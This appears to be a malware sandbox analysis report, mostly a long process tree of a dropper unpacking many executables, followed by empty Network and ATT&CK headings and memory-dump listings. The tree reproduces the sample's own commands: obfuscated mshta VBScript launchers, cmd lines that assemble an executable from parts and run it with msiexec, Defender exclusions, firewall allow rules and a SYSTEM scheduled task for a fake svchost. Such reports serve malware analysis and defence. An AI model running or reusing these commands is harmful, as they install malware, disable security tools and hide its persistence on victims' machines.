                                                                                                                                                              "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\Gid5rAfZJz0e2EdFIb3ymtwq.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\Gid5rAfZJz0e2EdFIb3ymtwq.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                              7⤵
                                                                                                                                                                PID:3680
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\Gid5rAfZJz0e2EdFIb3ymtwq.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\Gid5rAfZJz0e2EdFIb3ymtwq.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:688
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                                                      8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:5164
                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:5488
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:5976
                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:5672
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:3936
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                      12⤵
                                                                                                                                                                                        PID:6680
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                                                        12⤵
                                                                                                                                                                                          PID:6752
                                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                          msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                          12⤵
                                                                                                                                                                                            PID:4288
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill -im "Gid5rAfZJz0e2EdFIb3ymtwq.exe" -F
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:5200
                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\tHo1hZ4dA9UbnnteyYUIUfiN.exe
                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\tHo1hZ4dA9UbnnteyYUIUfiN.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:712
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:5252
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:5328
                                                                                                                                                                                      • C:\Windows\System32\netsh.exe
                                                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                        7⤵
                                                                                                                                                                                          PID:5388
                                                                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                          schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:5516
                                                                                                                                                                                        • C:\Windows\System\svchost.exe
                                                                                                                                                                                          "C:\Windows\System\svchost.exe" formal
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:5588
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:5388
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:5832
                                                                                                                                                                                                • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:5740
                                                                                                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:1888
                                                                                                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:5452
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Tue20fd8bc87d.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:3976
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20fd8bc87d.exe
                                                                                                                                                                                                  Tue20fd8bc87d.exe
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:1400
                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 1400 -s 1404
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:1640
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Tue209130fc0548.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1632
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue209130fc0548.exe
                                                                                                                                                                                                    Tue209130fc0548.exe
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:2252
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:4736
                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                          taskkill /f /im chrome.exe
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:4828
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Tue20fbed1f90.exe
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                    PID:1748
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20fbed1f90.exe
                                                                                                                                                                                                      Tue20fbed1f90.exe
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      PID:3000
                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ( "WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20fbed1f90.exe"" > ..\_4SO.EXE && sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If """"== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20fbed1f90.exe"" ) do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:4160
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20fbed1f90.exe" >..\_4SO.EXE && sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If ""== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20fbed1f90.exe" ) do taskkill /IM "%~nXY" -f
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:4624
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_4SO.EXE
                                                                                                                                                                                                                ..\_4SO.Exe /PZOIMJIYi~u3pALhs
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:4912
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ( "WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"" > ..\_4SO.EXE && sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If ""/PZOIMJIYi~u3pALhs""== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"" ) do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                      PID:5084
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE" >..\_4SO.EXE && sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If "/PZOIMJIYi~u3pALhs"== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE" ) do taskkill /IM "%~nXY" -f
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:4412
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vBsCripT: clOsE ( crEatEobJECT ( "WSCRIPt.SHELL" ). RUn ( "cMD.exE /q /C ecHo | SET /p = ""MZ"" >5~XZ.D & COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un +3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q * " , 0 , tRue ) )
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                          PID:4388
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /q /C ecHo | SET /p = "MZ" >5~XZ.D &COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un +3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q *
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                              PID:748
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" ecHo "
                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                  PID:4744
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>5~XZ.D"
                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                    PID:1168
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                    msiexec -y ..\WOYVBnm.9
                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                      PID:3216
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                taskkill /IM "Tue20fbed1f90.exe" -f
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:4456
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Tue20510b1c66a66b665.exe
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                        PID:704
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20510b1c66a66b665.exe
                                                                                                                                                                                                                          Tue20510b1c66a66b665.exe
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                          PID:2108
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Tue200479fad46beb53.exe
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:1504
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue200479fad46beb53.exe
                                                                                                                                                                                                                            Tue200479fad46beb53.exe
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:2140
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue200479fad46beb53.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue200479fad46beb53.exe
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:4112
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue200479fad46beb53.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue200479fad46beb53.exe
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:4484
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Tue20048630865b1f7.exe
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:3684
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20048630865b1f7.exe
                                                                                                                                                                                                                                  Tue20048630865b1f7.exe
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:2304
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Tue204af04ad6fd53.exe
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:3776
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue204af04ad6fd53.exe
                                                                                                                                                                                                                                    Tue204af04ad6fd53.exe
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:3828
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Tue207f806ce7e443b.exe
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:2080
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue207f806ce7e443b.exe
                                                                                                                                                                                                                                      Tue207f806ce7e443b.exe
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                      PID:1532
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Tue20ad8790ff9b.exe /mixone
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:1688
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20ad8790ff9b.exe
                                                                                                                                                                                                                                        Tue20ad8790ff9b.exe /mixone
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:1620
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "Tue20ad8790ff9b.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20ad8790ff9b.exe" & exit
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:5064
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                              taskkill /im "Tue20ad8790ff9b.exe" /f
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                              PID:4940
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Tue203edd6122.exe
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:1160
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue203edd6122.exe
                                                                                                                                                                                                                                            Tue203edd6122.exe
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                            PID:2880
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue203edd6122.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue203edd6122.exe
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:4104
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Tue20c444de2096ff.exe
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:1120
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20c444de2096ff.exe
                                                                                                                                                                                                                                                Tue20c444de2096ff.exe
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:1432
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 920
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:4856
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Tue2014c4fcdb03.exe
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:2384
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue2014c4fcdb03.exe
                                                                                                                                                                                                                                                  Tue2014c4fcdb03.exe
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                  PID:3108
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Tue20862a9d941f2ba5a.exe
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:1608
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20862a9d941f2ba5a.exe
                                                                                                                                                                                                                                                    Tue20862a9d941f2ba5a.exe
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:2368
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20862a9d941f2ba5a.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20862a9d941f2ba5a.exe
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:4140
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Tue20d9fa8465d82c.exe
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:4016
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20d9fa8465d82c.exe
                                                                                                                                                                                                                                                        Tue20d9fa8465d82c.exe
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        PID:2780
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 520
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                      PID:2364
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-LQ3BD.tmp\Tue204af04ad6fd53.tmp
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-LQ3BD.tmp\Tue204af04ad6fd53.tmp" /SL5="$7006C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue204af04ad6fd53.exe"
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                PID:1860
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue204af04ad6fd53.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue204af04ad6fd53.exe" /SILENT
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:4128
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-SGIN1.tmp\Tue204af04ad6fd53.tmp
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-SGIN1.tmp\Tue204af04ad6fd53.tmp" /SL5="$101F8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue204af04ad6fd53.exe" /SILENT
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:4260
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:5008
                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                  PID:4984
                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:4268
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\vsrhtgw
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\vsrhtgw
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:5204
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6E57.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\6E57.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:6752
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:6608
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\CCB.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\CCB.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:6856

                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                          • memory/68-373-0x00000251A8E40000-0x00000251A8EB2000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/760-375-0x0000014813C60000-0x0000014813CD2000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/1080-369-0x000002C68E440000-0x000002C68E4B2000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/1188-393-0x000001CF0BB00000-0x000001CF0BB72000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/1204-392-0x000001D457C10000-0x000001D457C82000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/1400-262-0x0000018B19360000-0x0000018B194C1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                                                          • memory/1400-249-0x0000018B19500000-0x0000018B1965B000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

